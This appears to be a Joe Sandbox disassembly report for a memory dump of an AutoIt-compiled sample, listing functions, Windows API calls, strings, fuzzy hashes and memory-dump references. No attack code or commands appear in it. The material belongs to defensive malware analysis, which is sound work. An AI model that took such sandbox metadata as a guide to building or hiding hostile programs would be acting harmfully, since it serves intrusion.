Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: b2add128c315d25bc8a5a920ee0e85785afe9381c9f0927c5927d7a78a180f2e
Instruction ID: 904567e1169e6177621f8f4a28e12daecbcb9fe0666d9a8bd9e27583904adcca
Opcode Fuzzy Hash: b2add128c315d25bc8a5a920ee0e85785afe9381c9f0927c5927d7a78a180f2e
Instruction Fuzzy Hash: 21319A71110205AFEB20DF68D880EFB77E9FF88768F009619F9A597280DA34B891C760

Uniqueness

Uniqueness Score: -1.00%

Function 012C97C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 012C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 012C9BB2

Part of subcall function 012C9944: GetWindowLongW.USER32(?,000000EB), ref: 012C9952

GetParent.USER32(?), ref: 013073A3
DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 0130742D

Strings

8lr, xrefs: 012C980F, 013073D2, 013073F9

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: LongWindow$ParentProc
String ID: 8lr
API String ID: 2181805148-2725927297
Opcode ID: 34afb909e9af8114255fb6be117c263fab383384619d950810a17bdf50c0f007
Instruction ID: 9ce7538810641668f8705c97334a776c3943002d745f0db35acfa3d7a5b5a4f0
Opcode Fuzzy Hash: 34afb909e9af8114255fb6be117c263fab383384619d950810a17bdf50c0f007
Instruction Fuzzy Hash: A621C134611105AFEF269F2CC8599BA3FD5EF06368F044399FB654B2E6C230A991C780

Uniqueness

Uniqueness Score: -1.00%

Function 013431EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0134327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01343287

Strings

Combobox, xrefs: 01343249

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 42c39f0e6efa5c9903cb71ea053a92d2565300a7f0f0d8820512a2dbeb7dd140
Instruction ID: b32997fd05fea23d28536773082b3fb6289d7c6fc2b500988367be3a1d0506ea
Opcode Fuzzy Hash: 42c39f0e6efa5c9903cb71ea053a92d2565300a7f0f0d8820512a2dbeb7dd140
Instruction Fuzzy Hash: 7711B6713002197FFF269E58DC84EBB7BAEFB44368F104525F91897291D631AC51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0131EF10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0131EF1D

Strings

xQr, xrefs: 0131EF1B
HANDLE, xrefs: 0131EF16

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen
String ID: HANDLE$xQr
API String ID: 176396367-2882394489
Opcode ID: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
Instruction ID: d07a2ee35914351ae76037ffc37fec625e94b735a2569c83c7e20b0235efc697
Opcode Fuzzy Hash: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
Instruction Fuzzy Hash: BF1129715101199BE71D8F18D488BBDF7ACDF80B19F62407AEC01CE0C8E7729A89C714

Uniqueness

Uniqueness Score: -1.00%

Function 013432A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

CreatePopupMenu.USER32 ref: 013432C7
CreatePopupMenu.USER32 ref: 01343339

Strings

8lr, xrefs: 01343313, 0134334B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CreateMenuPopup
String ID: 8lr
API String ID: 3826294624-2725927297
Opcode ID: a04fbd18ce410e38b4fe4b284ba46de59033a7d89f9cac15ed4357aac617b2bc
Instruction ID: ad3af952accddb307583bf4ca81124b734cf004836fabcac8d3a2f0773dce022
Opcode Fuzzy Hash: a04fbd18ce410e38b4fe4b284ba46de59033a7d89f9cac15ed4357aac617b2bc
Instruction Fuzzy Hash: BE213A386052149FEB21CF6CC446BD6BBE5FB0E368F08806AE9998B351D731B902CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01343710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 012B600E: CreateWindowExW.USER32 ref: 012B604C
Part of subcall function 012B600E: GetStockObject.GDI32(00000011), ref: 012B6060
Part of subcall function 012B600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 012B606A

GetWindowRect.USER32(00000000,?), ref: 0134377A
GetSysColor.USER32 ref: 01343794

Strings

static, xrefs: 01343757

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 630c8387c2fea010e628261284e1653bd56285491dae7511a9ef2e9c6d439895
Instruction ID: c92cd0a05bc08198504dfdb0dc4a28d782ffc5d53fdfed287d602c4a3769c773
Opcode Fuzzy Hash: 630c8387c2fea010e628261284e1653bd56285491dae7511a9ef2e9c6d439895
Instruction Fuzzy Hash: 5511267261020AAFDB11DFA8C845AEA7BF8FB08358F005915F995E3240EB35E8519B60

Uniqueness

Uniqueness Score: -1.00%

Function 01346181 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 013461FC
SendMessageW.USER32(?,00000194,00000000,00000000), ref: 01346225

Strings

8lr, xrefs: 013461A2

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend
String ID: 8lr
API String ID: 3850602802-2725927297
Opcode ID: 1d608cf7dcff1be6c705c3693d32418916237eafd87f44e6d41308a4399f110f
Instruction ID: 3b16c24e76310155e12980a8f03f5ae07c122148fb1a4394babc3ab1de2e64d1
Opcode Fuzzy Hash: 1d608cf7dcff1be6c705c3693d32418916237eafd87f44e6d41308a4399f110f
Instruction Fuzzy Hash: 2111B2B1140218BFEB118F6CCC06FB93BE8EB07318F004115FA169A1D1D6B0F640DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0132CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0132CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0132CDA6

Strings

<local>, xrefs: 0132CD66

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 623bad586289454f0bf8138a5220b8466e758a9e7428f73f0e1689104fdcd7aa
Instruction ID: a15cbb5b4c7497260491b89b482d77cbfd2299d2c8ffc6dfaf0515ddc671c130
Opcode Fuzzy Hash: 623bad586289454f0bf8138a5220b8466e758a9e7428f73f0e1689104fdcd7aa
Instruction Fuzzy Hash: F5114C712016357EE7346B6A8C45FFBBE6CEF026A8F00521AF10983080D7749444C6F0

Uniqueness

Uniqueness Score: -1.00%

Function 01343429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 013434AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 013434BA

Strings

edit, xrefs: 0134348F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 08c1c37b9128d63cf828dc347e1e143d8f27739f8c61a841fbdb3b86c566c0b5
Instruction ID: ef6274f4c6241b0a9d18a46e86ca92c4b5cefa020f9988d538331890cdd4f592
Opcode Fuzzy Hash: 08c1c37b9128d63cf828dc347e1e143d8f27739f8c61a841fbdb3b86c566c0b5
Instruction Fuzzy Hash: 79116D75100218ABEB224E68DC44AFB3BAEFB05378F504724F965A32D4C775EC519B50

Uniqueness

Uniqueness Score: -1.00%

Function 01344F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 01344FCC

Strings

8lr, xrefs: 01344FA1

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend
String ID: 8lr
API String ID: 3850602802-2725927297
Opcode ID: 407f98579668aab92ce1c5cd245a7f1445e26259b1309491146c1376e7b0fc0d
Instruction ID: 8bc356fd32c588b0042c2f0177498ddb441598cc4dacde7f6ec78ae5700ca4fa
Opcode Fuzzy Hash: 407f98579668aab92ce1c5cd245a7f1445e26259b1309491146c1376e7b0fc0d
Instruction Fuzzy Hash: 4B21E27AA1021AEFCB15CFA8C9448EABBF9FB4D354B004554FE05A7314D732E921DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01316C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

CharUpperBuffW.USER32(?,?), ref: 01316CB6
_wcslen.LIBCMT ref: 01316CC2

Strings

STOP, xrefs: 01316CBC, 01316CC1

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: dc12ebdd7b6bc687523f6dd814593a3063b55d86f920ac11dec97d4b80a38bc7
Instruction ID: 946168581c4be634f4563024e689dfa8e26deb0ec37cf959a0bf2a0f055c6db6
Opcode Fuzzy Hash: dc12ebdd7b6bc687523f6dd814593a3063b55d86f920ac11dec97d4b80a38bc7
Instruction Fuzzy Hash: 09010472A1052B8BCF25AFFDCC818BF37A8EB607187400538D91293188EB71D440C750

Uniqueness

Uniqueness Score: -1.00%

Function 012C90DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

8lr, xrefs: 01307077, 0130709D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID: 8lr
API String ID: 0-2725927297
Opcode ID: 4fd4a06541ecfcf4961e6a86a2ff8882d6a8e2c7c58b172cfd9263d5ad550fe6
Instruction ID: dce5209c4bb26cdc3f7d34eb14d7b9a7ea4b5c7fe00f68c35812d04aba09540a
Opcode Fuzzy Hash: 4fd4a06541ecfcf4961e6a86a2ff8882d6a8e2c7c58b172cfd9263d5ad550fe6
Instruction Fuzzy Hash: A1112B38600605AFDB21DF2CD850EA9B7E6FB89324F148359EA658B2E1C771F941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01311BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

Part of subcall function 01313CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01313CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 01311C46

Strings

ListBox, xrefs: 01311C10
ComboBox, xrefs: 01311BE5

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 4dfd97e92f8c5185517be3fff865df8bb6792911c2d65a68b6bbe14728ad3865
Instruction ID: 2932bd4d09d5d521552aa67333e13b257975ac6b6f0e0baa19ad0825c78bebd3
Opcode Fuzzy Hash: 4dfd97e92f8c5185517be3fff865df8bb6792911c2d65a68b6bbe14728ad3865
Instruction Fuzzy Hash: 2901DBB5751109A7DF1CEBA4C990DFFB7AC9F25388F140019DA0667284EA24AA08C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 01311D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

Part of subcall function 01313CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01313CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 01311DD3

Strings

ListBox, xrefs: 01311DA0
ComboBox, xrefs: 01311D75

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 789d21f2ab50b3be8a026a107cdc68396734371311b7c02f7162dafbdcb5df0f
Instruction ID: 6b050bd88712253bac9bd36883186fc490af187d10b3d12116f52575717300c1
Opcode Fuzzy Hash: 789d21f2ab50b3be8a026a107cdc68396734371311b7c02f7162dafbdcb5df0f
Instruction Fuzzy Hash: 56F0C8B1B51219A7DF1CF7B9CC90FFF777CAB15398F440919EA22632C4EA6465088760

Uniqueness

Uniqueness Score: -1.00%

Function 013490A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 012C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 012C9BB2

DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0130769C,?,?,?), ref: 01349111

Part of subcall function 012C9944: GetWindowLongW.USER32(?,000000EB), ref: 012C9952

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 013490F7

Strings

8lr, xrefs: 013490D6

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: 8lr
API String ID: 982171247-2725927297
Opcode ID: cbb0b99335b91e8bbc209bfc72bcd55782fe8196e2ed2a03cbbb564b3b41fb32
Instruction ID: ded8c0d6fe25337f50916a0fb7289fb9b1f7b30cedd9c61291437c55cddbdf87
Opcode Fuzzy Hash: cbb0b99335b91e8bbc209bfc72bcd55782fe8196e2ed2a03cbbb564b3b41fb32
Instruction Fuzzy Hash: 15018F35101214BFEB219F18DC49FAB7BAAFF8A76DF000158EA551B6E0CB727852CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0133747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01337493
_wcslen.LIBCMT ref: 013374B9

Strings

3, 3, 16, 1, xrefs: 01337483

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 553848df975478d487f4b69811d1ee166b86646a36c369c98ae0b23be1b9de41
Instruction ID: b5f9e3afbee6fb4b5582231d1e1e481fe951f5deade8afa3ead6976cd1e025dd
Opcode Fuzzy Hash: 553848df975478d487f4b69811d1ee166b86646a36c369c98ae0b23be1b9de41
Instruction Fuzzy Hash: 59E02B422103A120D231237FDCC49BF6A89CFD9550710182BE985D2365EAA49D9183A4

Uniqueness

Uniqueness Score: -1.00%

Function 01310B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 01310B23

Strings

Error allocating memory., xrefs: 01310B1C
AutoIt, xrefs: 01310B17

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: a30dc0e04528689acda7a4ea78d44b2de84b239f55d4e551fd65c31be202703e
Instruction ID: faa1e1fddb785dfc08a17cd4f49772978f7c7c2e61f6d2856ec471a0bf9e0c37
Opcode Fuzzy Hash: a30dc0e04528689acda7a4ea78d44b2de84b239f55d4e551fd65c31be202703e
Instruction Fuzzy Hash: A9E0D8312953193BD3283A95BC42F997BC8CF15F54F10441EF754555C38AD1749046E9

Uniqueness

Uniqueness Score: -1.00%

Function 012D0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 012CF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,012D0D71,?,?,?,012B100A), ref: 012CF7CE

IsDebuggerPresent.KERNEL32(?,?,?,012B100A), ref: 012D0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,012B100A), ref: 012D0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 012D0D7F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 0acccf9029703edef1b0354b2725a249771cbe0fee35a4be7792fe2a86825b7c
Instruction ID: 7d40f475d25497b913eb799547c9f59764eafa2575d0abb1dbf17f08ab059bf4
Opcode Fuzzy Hash: 0acccf9029703edef1b0354b2725a249771cbe0fee35a4be7792fe2a86825b7c
Instruction Fuzzy Hash: 23E06D742107028BE7709F7DE00469A7BE8EB14B45F04491EE48AC6609DBB0F0888BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0130D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0130D220

Strings

%.3d, xrefs: 0130D22B
X64, xrefs: 0130D2A8

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: f8a8465fad712562d5804139a07f24cd524686316d81e53ff6e72a9a766fee67
